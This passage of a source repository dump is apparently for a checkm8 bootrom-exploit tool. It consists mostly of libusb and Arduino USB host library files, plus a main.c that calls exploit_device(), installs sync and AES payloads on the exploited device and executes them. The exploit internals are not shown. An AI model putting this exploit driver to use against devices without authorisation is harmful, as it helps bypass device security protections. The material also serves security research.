45 | 46 | r = usbi_backend.clock_gettime(USBI_CLOCK_REALTIME, &timeout); 47 | if (r < 0) 48 | return r; 49 | 50 | timeout.tv_sec += tv->tv_sec; 51 | timeout.tv_nsec += tv->tv_usec * 1000; 52 | while (timeout.tv_nsec >= 1000000000L) { 53 | timeout.tv_nsec -= 1000000000L; 54 | timeout.tv_sec++; 55 | } 56 | 57 | return pthread_cond_timedwait(cond, mutex, &timeout); 58 | } 59 | 60 | int usbi_get_tid(void) 61 | { 62 | int ret; 63 | #if defined(__ANDROID__) 64 | ret = gettid(); 65 | #elif defined(__linux__) 66 | ret = syscall(SYS_gettid); 67 | #elif defined(__OpenBSD__) 68 | /* The following only works with OpenBSD > 5.1 as it requires 69 | real thread support. For 5.1 and earlier, -1 is returned. */ 70 | ret = syscall(SYS_getthrid); 71 | #elif defined(__APPLE__) 72 | ret = (int)pthread_mach_thread_np(pthread_self()); 73 | #elif defined(__CYGWIN__) 74 | ret = GetCurrentThreadId(); 75 | #else 76 | ret = -1; 77 | #endif 78 | /* TODO: NetBSD thread ID support */ 79 | return ret; 80 | } 81 | -------------------------------------------------------------------------------- /checkm8_libusb/src/os/poll_posix.c: -------------------------------------------------------------------------------- 1 | /* 2 | * poll_posix: poll compatibility wrapper for POSIX systems 3 | * Copyright © 2013 RealVNC Ltd. 4 | * 5 | * This library is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU Lesser General Public 7 | * License as published by the Free Software Foundation; either 8 | * version 2.1 of the License, or (at your option) any later version. 9 | * 10 | * This library is distributed in the hope that it will be useful, 11 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | * Lesser General Public License for more details. 14 | * 15 | * You should have received a copy of the GNU Lesser General Public 16 | * License along with this library; if not, write to the Free Software 17 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 18 | * 19 | */ 20 | 21 | #include "libusb_config.h" 22 | 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #include "../libusbi.h" 29 | 30 | int usbi_pipe(int pipefd[2]) 31 | { 32 | #if defined(HAVE_PIPE2) 33 | int ret = pipe2(pipefd, O_CLOEXEC); 34 | #else 35 | int ret = pipe(pipefd); 36 | #endif 37 | 38 | if (ret != 0) { 39 | usbi_err(NULL, "failed to create pipe (%d)", errno); 40 | return ret; 41 | } 42 | 43 | #if !defined(HAVE_PIPE2) && defined(FD_CLOEXEC) 44 | ret = fcntl(pipefd[0], F_GETFD); 45 | if (ret == -1) { 46 | usbi_err(NULL, "failed to get pipe fd flags (%d)", errno); 47 | goto err_close_pipe; 48 | } 49 | ret = fcntl(pipefd[0], F_SETFD, ret | FD_CLOEXEC); 50 | if (ret == -1) { 51 | usbi_err(NULL, "failed to set pipe fd flags (%d)", errno); 52 | goto err_close_pipe; 53 | } 54 | 55 | ret = fcntl(pipefd[1], F_GETFD); 56 | if (ret == -1) { 57 | usbi_err(NULL, "failed to get pipe fd flags (%d)", errno); 58 | goto err_close_pipe; 59 | } 60 | ret = fcntl(pipefd[1], F_SETFD, ret | FD_CLOEXEC); 61 | if (ret == -1) { 62 | usbi_err(NULL, "failed to set pipe fd flags (%d)", errno); 63 | goto err_close_pipe; 64 | } 65 | #endif 66 | 67 | ret = fcntl(pipefd[1], F_GETFL); 68 | if (ret == -1) { 69 | usbi_err(NULL, "failed to get pipe fd status flags (%d)", errno); 70 | goto err_close_pipe; 71 | } 72 | ret = fcntl(pipefd[1], F_SETFL, ret | O_NONBLOCK); 73 | if (ret == -1) { 74 | usbi_err(NULL, "failed to set pipe fd status flags (%d)", errno); 75 | goto err_close_pipe; 76 | } 77 | 78 | return 0; 79 | 80 | err_close_pipe: 81 | close(pipefd[0]); 82 | close(pipefd[1]); 83 | return ret; 84 | } 85 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/hexdump.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #if !defined(_usb_h_) || defined(__HEXDUMP_H__) 26 | #error "Never include hexdump.h directly; include Usb.h instead" 27 | #else 28 | #define __HEXDUMP_H__ 29 | 30 | extern int UsbDEBUGlvl; 31 | 32 | template 33 | class HexDumper : public BASE_CLASS { 34 | uint8_t byteCount; 35 | OFFSET_TYPE byteTotal; 36 | 37 | public: 38 | 39 | HexDumper() : byteCount(0), byteTotal(0) { 40 | }; 41 | 42 | void Initialize() { 43 | byteCount = 0; 44 | byteTotal = 0; 45 | }; 46 | 47 | void Parse(const LEN_TYPE len, const uint8_t *pbuf, const OFFSET_TYPE &offset); 48 | }; 49 | 50 | template 51 | void HexDumper::Parse(const LEN_TYPE len, const uint8_t *pbuf, const OFFSET_TYPE &offset __attribute__((unused))) { 52 | if(UsbDEBUGlvl >= 0x80) { // Fully bypass this block of code if we do not debug. 53 | for(LEN_TYPE j = 0; j < len; j++, byteCount++, byteTotal++) { 54 | if(!byteCount) { 55 | PrintHex (byteTotal, 0x80); 56 | E_Notify(PSTR(": "), 0x80); 57 | } 58 | PrintHex (pbuf[j], 0x80); 59 | E_Notify(PSTR(" "), 0x80); 60 | 61 | if(byteCount == 15) { 62 | E_Notify(PSTR("\r\n"), 0x80); 63 | byteCount = 0xFF; 64 | } 65 | } 66 | } 67 | } 68 | 69 | #endif // __HEXDUMP_H__ 70 | -------------------------------------------------------------------------------- /checkm8_remote/main.c: -------------------------------------------------------------------------------- 1 | #include "checkm8.h" 2 | #include "payload.h" 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "command.h" 9 | 10 | void checkm8_debug_indent(const char *format, ...) 11 | { 12 | #ifdef CHECKM8_LOGGING 13 | void *traces[100]; 14 | int depth = backtrace(traces, 100) - 5; 15 | for(int i = 0; i < depth; i++) 16 | { 17 | printf("\t"); 18 | } 19 | va_list args; 20 | 21 | va_start (args, format); 22 | vprintf(format, args); 23 | va_end(args); 24 | #endif 25 | } 26 | 27 | void checkm8_debug_block(const char *format, ...) 28 | { 29 | #ifdef CHECKM8_LOGGING 30 | va_list args; 31 | 32 | va_start (args, format); 33 | vprintf(format, args); 34 | va_end(args); 35 | #endif 36 | } 37 | 38 | 39 | int main() 40 | { 41 | int ret; 42 | struct pwned_device *dev = exploit_device(); 43 | if(dev == NULL || dev->status == DEV_NORMAL) 44 | { 45 | printf("Failed to exploit device\n"); 46 | return -1; 47 | } 48 | 49 | struct dev_cmd_resp *resp; 50 | ret = install_payload(dev, PAYLOAD_SYNC, DRAM); 51 | if(IS_CHECKM8_FAIL(ret)) 52 | { 53 | printf("Failed to install sync payload\n"); 54 | return -1; 55 | } 56 | 57 | ret = install_payload(dev, PAYLOAD_AES, DRAM); 58 | if(IS_CHECKM8_FAIL(ret)) 59 | { 60 | printf("Failed to install AES payload\n"); 61 | return -1; 62 | } 63 | 64 | resp = execute_payload(dev, PAYLOAD_SYNC, 0); 65 | if(IS_CHECKM8_FAIL(resp->ret)) 66 | { 67 | printf("Failed to execute sync payload\n"); 68 | return -1; 69 | } 70 | 71 | unsigned char data[16] = {0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 72 | 0xef}; 73 | unsigned char key[16] = {0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xbe, 74 | 0xef}; 75 | 76 | free_dev_cmd_resp(resp); 77 | resp = write_payload(dev, 0x180152000, data, 16); 78 | if(IS_CHECKM8_FAIL(resp->ret)) 79 | { 80 | printf("Failed to write AES data\n"); 81 | return -1; 82 | } 83 | 84 | free_dev_cmd_resp(resp); 85 | resp = write_payload(dev, 0x180152010, key, 16); 86 | if(IS_CHECKM8_FAIL(resp->ret)) 87 | { 88 | printf("Failed to write AES key\n"); 89 | return -1; 90 | } 91 | 92 | free_dev_cmd_resp(resp); 93 | resp = execute_payload(dev, PAYLOAD_AES, 7, 16, 0x180152000, DFU_IMAGE_BASE + 56, 128, 0, 0x180152010, 0); 94 | 95 | if(IS_CHECKM8_FAIL(resp->ret)) 96 | { 97 | printf("Failed to execute AES\n"); 98 | return -1; 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/parsetools.cpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | #include "../../include/Usb.h" 25 | 26 | bool MultiByteValueParser::Parse(uint8_t **pp, uint16_t *pcntdn) { 27 | if(!pBuf) { 28 | Notify(PSTR("Buffer pointer is NULL!\r\n"), 0x80); 29 | return false; 30 | } 31 | for(; countDown && (*pcntdn); countDown--, (*pcntdn)--, (*pp)++) 32 | pBuf[valueSize - countDown] = (**pp); 33 | 34 | if(countDown) 35 | return false; 36 | 37 | countDown = valueSize; 38 | return true; 39 | } 40 | 41 | bool PTPListParser::Parse(uint8_t **pp, uint16_t *pcntdn, PTP_ARRAY_EL_FUNC pf, const void *me) { 42 | switch(nStage) { 43 | case 0: 44 | pBuf->valueSize = lenSize; 45 | theParser.Initialize(pBuf); 46 | nStage = 1; 47 | 48 | case 1: 49 | if(!theParser.Parse(pp, pcntdn)) 50 | return false; 51 | 52 | arLen = 0; 53 | arLen = (pBuf->valueSize >= 4) ? *((uint32_t*)pBuf->pValue) : (uint32_t)(*((uint16_t*)pBuf->pValue)); 54 | arLenCntdn = arLen; 55 | nStage = 2; 56 | 57 | case 2: 58 | pBuf->valueSize = valSize; 59 | theParser.Initialize(pBuf); 60 | nStage = 3; 61 | 62 | case 3: 63 | for(; arLenCntdn; arLenCntdn--) { 64 | if(!theParser.Parse(pp, pcntdn)) 65 | return false; 66 | 67 | if(pf) 68 | pf(pBuf, (arLen - arLenCntdn), me); 69 | } 70 | 71 | nStage = 0; 72 | } 73 | return true; 74 | } 75 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/printhex.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #if !defined(_usb_h_) || defined(__PRINTHEX_H__) 26 | #error "Never include printhex.h directly; include Usb.h instead" 27 | #else 28 | #define __PRINTHEX_H__ 29 | 30 | void E_Notifyc(char c, int lvl); 31 | 32 | template 33 | void PrintHex(T val, int lvl) { 34 | int num_nibbles = sizeof (T) * 2; 35 | 36 | do { 37 | char v = 48 + (((val >> (num_nibbles - 1) * 4)) & 0x0f); 38 | if(v > 57) v += 7; 39 | E_Notifyc(v, lvl); 40 | } while(--num_nibbles); 41 | } 42 | 43 | template 44 | void PrintBin(T val, int lvl) { 45 | for(T mask = (((T)1) << ((sizeof (T) << 3) - 1)); mask; mask >>= 1) 46 | if(val & mask) 47 | E_Notifyc('1', lvl); 48 | else 49 | E_Notifyc('0', lvl); 50 | } 51 | 52 | template 53 | void SerialPrintHex(T val) { 54 | int num_nibbles = sizeof (T) * 2; 55 | 56 | do { 57 | char v = 48 + (((val >> (num_nibbles - 1) * 4)) & 0x0f); 58 | if(v > 57) v += 7; 59 | USB_HOST_SERIAL.print(v); 60 | } while(--num_nibbles); 61 | } 62 | 63 | template 64 | void PrintHex2(Print *prn, T val) { 65 | T mask = (((T)1) << (((sizeof (T) << 1) - 1) << 2)); 66 | 67 | while(mask > 1) { 68 | if(val < mask) 69 | prn->print("0"); 70 | 71 | mask >>= 4; 72 | } 73 | prn->print((T)val, HEX); 74 | } 75 | 76 | template void D_PrintHex(T val __attribute__((unused)), int lvl __attribute__((unused))) { 77 | #ifdef DEBUG_USB_HOST 78 | PrintHex (val, lvl); 79 | #endif 80 | } 81 | 82 | template 83 | void D_PrintBin(T val, int lvl) { 84 | #ifdef DEBUG_USB_HOST 85 | PrintBin (val, lvl); 86 | #endif 87 | } 88 | 89 | 90 | 91 | #endif // __PRINTHEX_H__ 92 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/message.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | #if !defined(_usb_h_) || defined(__MESSAGE_H__) 25 | #error "Never include message.h directly; include Usb.h instead" 26 | #else 27 | #define __MESSAGE_H__ 28 | 29 | extern int UsbDEBUGlvl; 30 | 31 | void E_Notify(char const * msg, int lvl); 32 | void E_Notify(uint8_t b, int lvl); 33 | void E_NotifyStr(char const * msg, int lvl); 34 | void E_Notifyc(char c, int lvl); 35 | 36 | #ifdef DEBUG_USB_HOST 37 | #define Notify E_Notify 38 | #define NotifyStr E_NotifyStr 39 | #define Notifyc E_Notifyc 40 | void NotifyFailGetDevDescr(uint8_t reason); 41 | void NotifyFailSetDevTblEntry(uint8_t reason); 42 | void NotifyFailGetConfDescr(uint8_t reason); 43 | void NotifyFailSetConfDescr(uint8_t reason); 44 | void NotifyFailGetDevDescr(void); 45 | void NotifyFailSetDevTblEntry(void); 46 | void NotifyFailGetConfDescr(void); 47 | void NotifyFailSetConfDescr(void); 48 | void NotifyFailUnknownDevice(uint16_t VID, uint16_t PID); 49 | void NotifyFail(uint8_t rcode); 50 | #else 51 | #define Notify(...) ((void)0) 52 | #define NotifyStr(...) ((void)0) 53 | #define Notifyc(...) ((void)0) 54 | #define NotifyFailGetDevDescr(...) ((void)0) 55 | #define NotifyFailSetDevTblEntry(...) ((void)0) 56 | #define NotifyFailGetConfDescr(...) ((void)0) 57 | #define NotifyFailGetDevDescr(...) ((void)0) 58 | #define NotifyFailSetDevTblEntry(...) ((void)0) 59 | #define NotifyFailGetConfDescr(...) ((void)0) 60 | #define NotifyFailSetConfDescr(...) ((void)0) 61 | #define NotifyFailUnknownDevice(...) ((void)0) 62 | #define NotifyFail(...) ((void)0) 63 | #endif 64 | 65 | template 66 | void ErrorMessage(uint8_t level, char const * msg, ERROR_TYPE rcode = 0) { 67 | #ifdef DEBUG_USB_HOST 68 | Notify(msg, level); 69 | Notify(PSTR(": "), level); 70 | D_PrintHex (rcode, level); 71 | Notify(PSTR("\r\n"), level); 72 | #endif 73 | } 74 | 75 | template 76 | void ErrorMessage(char const * msg __attribute__((unused)), ERROR_TYPE rcode __attribute__((unused)) = 0) { 77 | #ifdef DEBUG_USB_HOST 78 | Notify(msg, 0x80); 79 | Notify(PSTR(": "), 0x80); 80 | D_PrintHex (rcode, 0x80); 81 | Notify(PSTR("\r\n"), 0x80); 82 | #endif 83 | } 84 | 85 | #endif // __MESSAGE_H__ 86 | -------------------------------------------------------------------------------- /checkm8_libusb/src/os/threads_posix.h: -------------------------------------------------------------------------------- 1 | /* 2 | * src synchronization using POSIX Threads 3 | * 4 | * Copyright © 2010 Peter Stuge 5 | * 6 | * This library is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU Lesser General Public 8 | * License as published by the Free Software Foundation; either 9 | * version 2.1 of the License, or (at your option) any later version. 10 | * 11 | * This library is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | * Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public 17 | * License along with this library; if not, write to the Free Software 18 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 19 | */ 20 | 21 | #ifndef LIBUSB_THREADS_POSIX_H 22 | #define LIBUSB_THREADS_POSIX_H 23 | 24 | #include 25 | #ifdef HAVE_SYS_TIME_H 26 | #include 27 | #endif 28 | 29 | #define USBI_MUTEX_INITIALIZER PTHREAD_MUTEX_INITIALIZER 30 | typedef pthread_mutex_t usbi_mutex_static_t; 31 | static inline void usbi_mutex_static_lock(usbi_mutex_static_t *mutex) 32 | { 33 | (void)pthread_mutex_lock(mutex); 34 | } 35 | static inline void usbi_mutex_static_unlock(usbi_mutex_static_t *mutex) 36 | { 37 | (void)pthread_mutex_unlock(mutex); 38 | } 39 | 40 | typedef pthread_mutex_t usbi_mutex_t; 41 | static inline int usbi_mutex_init(usbi_mutex_t *mutex) 42 | { 43 | return pthread_mutex_init(mutex, NULL); 44 | } 45 | static inline void usbi_mutex_lock(usbi_mutex_t *mutex) 46 | { 47 | (void)pthread_mutex_lock(mutex); 48 | } 49 | static inline void usbi_mutex_unlock(usbi_mutex_t *mutex) 50 | { 51 | (void)pthread_mutex_unlock(mutex); 52 | } 53 | static inline int usbi_mutex_trylock(usbi_mutex_t *mutex) 54 | { 55 | return pthread_mutex_trylock(mutex); 56 | } 57 | static inline void usbi_mutex_destroy(usbi_mutex_t *mutex) 58 | { 59 | (void)pthread_mutex_destroy(mutex); 60 | } 61 | 62 | typedef pthread_cond_t usbi_cond_t; 63 | static inline void usbi_cond_init(pthread_cond_t *cond) 64 | { 65 | (void)pthread_cond_init(cond, NULL); 66 | } 67 | static inline int usbi_cond_wait(usbi_cond_t *cond, usbi_mutex_t *mutex) 68 | { 69 | return pthread_cond_wait(cond, mutex); 70 | } 71 | int usbi_cond_timedwait(usbi_cond_t *cond, 72 | usbi_mutex_t *mutex, const struct timeval *tv); 73 | static inline void usbi_cond_broadcast(usbi_cond_t *cond) 74 | { 75 | (void)pthread_cond_broadcast(cond); 76 | } 77 | static inline void usbi_cond_destroy(usbi_cond_t *cond) 78 | { 79 | (void)pthread_cond_destroy(cond); 80 | } 81 | 82 | typedef pthread_key_t usbi_tls_key_t; 83 | static inline void usbi_tls_key_create(usbi_tls_key_t *key) 84 | { 85 | (void)pthread_key_create(key, NULL); 86 | } 87 | static inline void *usbi_tls_key_get(usbi_tls_key_t key) 88 | { 89 | return pthread_getspecific(key); 90 | } 91 | static inline void usbi_tls_key_set(usbi_tls_key_t key, void *ptr) 92 | { 93 | (void)pthread_setspecific(key, ptr); 94 | } 95 | static inline void usbi_tls_key_delete(usbi_tls_key_t key) 96 | { 97 | (void)pthread_key_delete(key); 98 | } 99 | 100 | int usbi_get_tid(void); 101 | 102 | #endif /* LIBUSB_THREADS_POSIX_H */ 103 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/depend.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: checkm8_remote/main.c 5 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: checkm8_remote/include/checkm8.h 6 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: checkm8_remote/include/command.h 7 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: checkm8_remote/include/libusb_helpers.h 8 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: checkm8_remote/include/payload.h 9 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: include/checkm8_config.h 10 | 11 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: checkm8_remote/src/command.c 12 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: checkm8_remote/include/checkm8.h 13 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: checkm8_remote/include/command.h 14 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: checkm8_remote/include/libusb_helpers.h 15 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: include/checkm8_config.h 16 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: include/libusb.h 17 | 18 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: checkm8_remote/src/exploit.c 19 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: checkm8_remote/include/checkm8.h 20 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: checkm8_remote/include/libusb_helpers.h 21 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: include/checkm8_config.h 22 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: include/libusb.h 23 | 24 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_remote/src/libusb_helpers.c 25 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_libusb/src/libusbi.h 26 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_libusb/src/os/poll_posix.h 27 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_libusb/src/os/threads_posix.h 28 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_libusb/src/version.h 29 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_libusb/src/version_nano.h 30 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_remote/include/checkm8.h 31 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: checkm8_remote/include/libusb_helpers.h 32 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: include/checkm8_config.h 33 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: include/libusb.h 34 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: include/libusb_config.h 35 | 36 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: checkm8_remote/src/payload.c 37 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: checkm8_remote/include/checkm8.h 38 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: checkm8_remote/include/command.h 39 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: checkm8_remote/include/libusb_helpers.h 40 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: checkm8_remote/include/payload.h 41 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: include/checkm8_config.h 42 | 43 | -------------------------------------------------------------------------------- /checkm8_arduino/cmake/ArduinoToolchain.cmake: -------------------------------------------------------------------------------- 1 | #=============================================================================# 2 | # Author: Tomasz Bogdal (QueezyTheGreat) 3 | # Home: https://github.com/queezythegreat/arduino-cmake 4 | # 5 | # This Source Code Form is subject to the terms of the Mozilla Public 6 | # License, v. 2.0. If a copy of the MPL was not distributed with this file, 7 | # You can obtain one at http://mozilla.org/MPL/2.0/. 8 | #=============================================================================# 9 | set(CMAKE_SYSTEM_NAME Arduino) 10 | 11 | set(CMAKE_C_COMPILER avr-gcc) 12 | set(CMAKE_CXX_COMPILER avr-g++) 13 | 14 | # Add current directory to CMake Module path automatically 15 | if(EXISTS ${CMAKE_CURRENT_LIST_DIR}/Platform/Arduino.cmake) 16 | set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_CURRENT_LIST_DIR}) 17 | endif() 18 | 19 | #=============================================================================# 20 | # System Paths # 21 | #=============================================================================# 22 | if(UNIX) 23 | include(Platform/UnixPaths) 24 | if(APPLE) 25 | list(APPEND CMAKE_SYSTEM_PREFIX_PATH ~/Applications 26 | /Applications 27 | /Developer/Applications 28 | /sw # Fink 29 | /opt/local) # MacPorts 30 | endif() 31 | elseif(WIN32) 32 | include(Platform/WindowsPaths) 33 | endif() 34 | 35 | 36 | #=============================================================================# 37 | # Detect Arduino SDK # 38 | #=============================================================================# 39 | if(NOT ARDUINO_SDK_PATH) 40 | set(ARDUINO_PATHS) 41 | 42 | foreach(DETECT_VERSION_MAJOR 1) 43 | foreach(DETECT_VERSION_MINOR RANGE 5 0) 44 | list(APPEND ARDUINO_PATHS arduino-${DETECT_VERSION_MAJOR}.${DETECT_VERSION_MINOR}) 45 | foreach(DETECT_VERSION_PATCH RANGE 3 0) 46 | list(APPEND ARDUINO_PATHS arduino-${DETECT_VERSION_MAJOR}.${DETECT_VERSION_MINOR}.${DETECT_VERSION_PATCH}) 47 | endforeach() 48 | endforeach() 49 | endforeach() 50 | 51 | foreach(VERSION RANGE 23 19) 52 | list(APPEND ARDUINO_PATHS arduino-00${VERSION}) 53 | endforeach() 54 | 55 | if(UNIX) 56 | file(GLOB SDK_PATH_HINTS /usr/share/arduino* 57 | /opt/local/arduino* 58 | /opt/arduino* 59 | /usr/local/share/arduino*) 60 | elseif(WIN32) 61 | set(SDK_PATH_HINTS "C:\\Program Files\\Arduino" 62 | "C:\\Program Files (x86)\\Arduino" 63 | ) 64 | endif() 65 | list(SORT SDK_PATH_HINTS) 66 | list(REVERSE SDK_PATH_HINTS) 67 | endif() 68 | 69 | find_path(ARDUINO_SDK_PATH 70 | NAMES lib/version.txt 71 | PATH_SUFFIXES share/arduino 72 | Arduino.app/Contents/Resources/Java/ 73 | Arduino.app/Contents/Java/ 74 | ${ARDUINO_PATHS} 75 | HINTS ${SDK_PATH_HINTS} 76 | DOC "Arduino SDK path.") 77 | 78 | if(ARDUINO_SDK_PATH) 79 | list(APPEND CMAKE_SYSTEM_PREFIX_PATH ${ARDUINO_SDK_PATH}/hardware/tools/avr) 80 | list(APPEND CMAKE_SYSTEM_PREFIX_PATH ${ARDUINO_SDK_PATH}/hardware/tools/avr/utils) 81 | else() 82 | message(FATAL_ERROR "Could not find Arduino SDK (set ARDUINO_SDK_PATH)!") 83 | endif() 84 | 85 | set(ARDUINO_CPUMENU) 86 | if(ARDUINO_CPU) 87 | set(ARDUINO_CPUMENU ".menu.cpu.${ARDUINO_CPU}") 88 | endif(ARDUINO_CPU) 89 | 90 | -------------------------------------------------------------------------------- /checkm8_libusb/src/hotplug.h: -------------------------------------------------------------------------------- 1 | /* -*- Mode: C; indent-tabs-mode:t ; c-basic-offset:8 -*- */ 2 | /* 3 | * Hotplug support for src 4 | * Copyright © 2012-2013 Nathan Hjelm 5 | * Copyright © 2012-2013 Peter Stuge 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef USBI_HOTPLUG_H 23 | #define USBI_HOTPLUG_H 24 | 25 | #include "libusbi.h" 26 | 27 | enum usbi_hotplug_flags { 28 | /* This callback is interested in device arrivals */ 29 | USBI_HOTPLUG_DEVICE_ARRIVED = 